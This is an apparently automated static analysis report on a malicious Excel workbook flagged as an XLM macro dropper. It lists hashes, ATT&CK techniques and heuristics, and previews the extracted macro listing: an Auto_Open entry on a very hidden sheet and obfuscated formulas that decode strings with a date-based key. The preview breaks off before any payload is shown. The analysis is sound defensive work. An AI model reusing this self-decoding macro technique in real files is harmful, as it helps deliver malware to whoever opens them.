Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5af3bdbe31bf60dd…

MALICIOUS

Office (OLE)

Size: 192.0 KB | Created: 2020-04-10 06:53:37 | Authoring application: Microsoft Excel | First seen: 2020-07-24
MD5: bf1efbdca05fab7682b9da5b800c2d4c
SHA-1: e57949811523eed8ab9321394a537bb909eaa7e7
SHA-256: 5af3bdbe31bf60ddc4bd101f4bee6e843a58450b4d39c8a12ce58135ec4b1b19
Risk Score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

This Excel file contains Excel 4.0 macros, specifically an Auto_Open macro that utilizes dangerous functions like RUN. ClamAV identifies this as Xls.Dropper.Agent-7693286-0, indicating its function as a dropper. The macro's structure suggests it is designed to download and execute a secondary payload.

Heuristics 5

  • ClamAV: Xls.Dropper.Agent-7693286-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7693286-0
  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ - In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# - In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ - In document text (OLE body)
    • http://ns.microsoft.com/photo/1.0/ - In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 22486 bytes
SHA-256: 036ffc6cf9eb96c0e0577bd07bdb650d93d04568ab238dc75e902b8bf2196453
Script preview (first 1,000 lines of the extracted script):
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, very hidden -  8zH01dEBU
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!X1 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  8zH01dEBU,X1,"FORMULA(DAY(NOW())+7,X33)",""
'  8zH01dEBU,X2,"FORMULA(CHAR(A1-X33)&CHAR(A2-X33)&CHAR(A3-X33)&CHAR(A4-X33)&CHAR(A5-X33)&CHAR(A6-X33)&CHAR(A7-X33)&CHAR(A8-X33)&CHAR(A9-X33)&CHAR(A10-X33)&CHAR(A11-X33)&CHAR(A12-X33)&CHAR(A13-X33)&CHAR(A14-X33)&CHAR(A15-X33)&CHAR(A16-X33)&CHAR(A17-X33)&CHAR(A18-X33)&CHAR(A19-X33)&CHAR(A20-X33)&CHAR(A21-X33)&CHAR(A22-X33)&CHAR(A23-X33)&CHAR(A24-X33)&CHAR(A25-X33)&CHAR(A26-X33)&CHAR(A27-X33)&CHAR(A28-X33)&CHAR(A29-X33)&CHAR(A30-X33)&CHAR(A31-X33)&CHAR(A32-X33)&CHAR(A33-X33)&CHAR(A34-X33)&CHAR(A35-X33)&CHAR(A36-X33)&CHAR(A37-X33)&CHAR(A38-X33)&CHAR(A39-X33)&CHAR(A40-X33),Y1)",""
'  8zH01dEBU,X3,"FORMULA(CHAR(B1-X33)&CHAR(B2-X33)&CHAR(B3-X33)&CHAR(B4-X33)&CHAR(B5-X33)&CHAR(B6-X33)&CHAR(B7-X33)&CHAR(B8-X33)&CHAR(B9-X33)&CHAR(B10-X33)&CHAR(B11-X33)&CHAR(B12-X33)&CHAR(B13-X33)&CHAR(B14-X33)&CHAR(B15-X33)&CHAR(B16-X33)&CHAR(B17-X33)&CHAR(B18-X33)&CHAR(B19-X33)&CHAR(B20-X33)&CHAR(B21-X33)&CHAR(B22-X33)&CHAR(B23-X33)&CHAR(B24-X33)&CHAR(B25-X33)&CHAR(B26-X33)&CHAR(B27-X33)&CHAR(B28-X33)&CHAR(B29-X33)&CHAR(B30-X33)&CHAR(B31-X33)&CHAR(B32-X33)&CHAR(B33-X33)&CHAR(B34-X33)&CHAR(B35-X33)&CHAR(B36-X33)&CHAR(B37-X33)&CHAR(B38-X33)&CHAR(B39-X33)&CHAR(B40-X33),Y2)",""
'  8zH01dEBU,X4,"FORMULA(CHAR(C1-X33)&CHAR(C2-X33)&CHAR(C3-X33)&CHAR(C4-X33)&CHAR(C5-X33)&CHAR(C6-X33)&CHAR(C7-X33)&CHAR(C8-X33)&CHAR(C9-X33)&CHAR(C10-X33)&CHAR(C11-X33)&CHAR(C12-X33)&CHAR(C13-X33)&CHAR(C14-X33)&CHAR(C15-X33)&CHAR(C16-X33)&CHAR(C17-X33)&CHAR(C18-X33)&CHAR(C19-X33)&CHAR(C20-X33)&CHAR(C21-X33)&CHAR(C22-X33)&CHAR(C23-X33)&CHAR(C24-X33)&CHAR(C25-X33)&CHAR(C26-X33)&CHAR(C27-X33)&CHAR(C28-X33)&CHAR(C29-X33)&CHAR(C30-X33)&CHAR(C31-X33)&CHAR(C32-X33)&CHAR(C33-X33)&CHAR(C34-X33)&CHAR(C35-X33),Y3)",""
'  8zH01dEBU,X5,"FORMULA(CHAR(D1-X33)&CHAR(D2-X33)&CHAR(D3-X33)&CHAR(D4-X33)&CHAR(D5-X33)&CHAR(D6-X33)&CHAR(D7-X33)&CHAR(D8-X33)&CHAR(D9-X33)&CHAR(D10-X33)&CHAR(D11-X33)&CHAR(D12-X33)&CHAR(D13-X33)&CHAR(D14-X33)&CHAR(D15-X33)&CHAR(D16-X33)&CHAR(D17-X33)&CHAR(D18-X33)&CHAR(D19-X33)&CHAR(D20-X33)&CHAR(D21-X33)&CHAR(D22-X33)&CHAR(D23-X33)&CHAR(D24-X33)&CHAR(D25-X33)&CHAR(D26-X33)&CHAR(D27-X33)&CHAR(D28-X33)&CHAR(D29-X33)&CHAR(D30-X33)&CHAR(D31-X33)&CHAR(D32-X33)&CHAR(D33-X33)&CHAR(D34-X33)&CHAR(D35-X33),Y4)",""
'  8zH01dEBU,X6,"FORMULA(CHAR(E1-X33)&CHAR(E2-X33)&CHAR(E3-X33)&CHAR(E4-X33)&CHAR(E5-X33)&CHAR(E6-X33)&CHAR(E7-X33)&CHAR(E8-X33)&CHAR(E9-X33)&CHAR(E10-X33)&CHAR(E11-X33)&CHAR(E12-X33)&CHAR(E13-X33)&CHAR(E14-X33)&CHAR(E15-X33)&CHAR(E16-X33)&CHAR(E17-X33)&CHAR(E18-X33)&CHAR(E19-X33)&CHAR(E20-X33)&CHAR(E21-X33)&CHAR(E22-X33)&CHAR(E23-X33)&CHAR(E24-X33)&CHAR(E25-X33)&CHAR(E26-X33)&CHAR(E27-X33)&CHAR(E28-X33)&CHAR(E29-X33)&CHAR(E30-X33)&CHAR(E31-X33)&CHAR(E32-X33)&CHAR(E33-X33)&CHAR(E34-X33)&CHAR(E35-X33)&CHAR(E36-X33)&CHAR(E37-X33)&CHAR(E38-X33)&CHAR(E39-X33)&CHAR(E40-X33)&CHAR(E41-X33)&CHAR(E42-X33)&CHAR(E43-X33)&CHAR(E44-X33)&CHAR(E45-X33)&CHAR(E46-X33)&CHAR(E47-X33)&CHAR(E48-X33)&CHAR(E49-X33)&CHAR(E50-X33)&CHAR(E51-X33)&CHAR(E52-X33)&CHAR(E53-X33)&CHAR(E54-X33)&CHAR(E55-X33)&CHAR(E56-X33)&CHAR(E57-X33)&CHAR(E58-X33)&CHAR(E59-X33)&CHAR(E60-X33)&CHAR(E61-X33)&CHAR(E62-X33),Y5)",""
'  8zH01dEBU,X7,"FORMULA(CHAR(F1-X33)&CHAR(F2-X33)&CHAR(F3-X33)&CHAR(
... (truncated)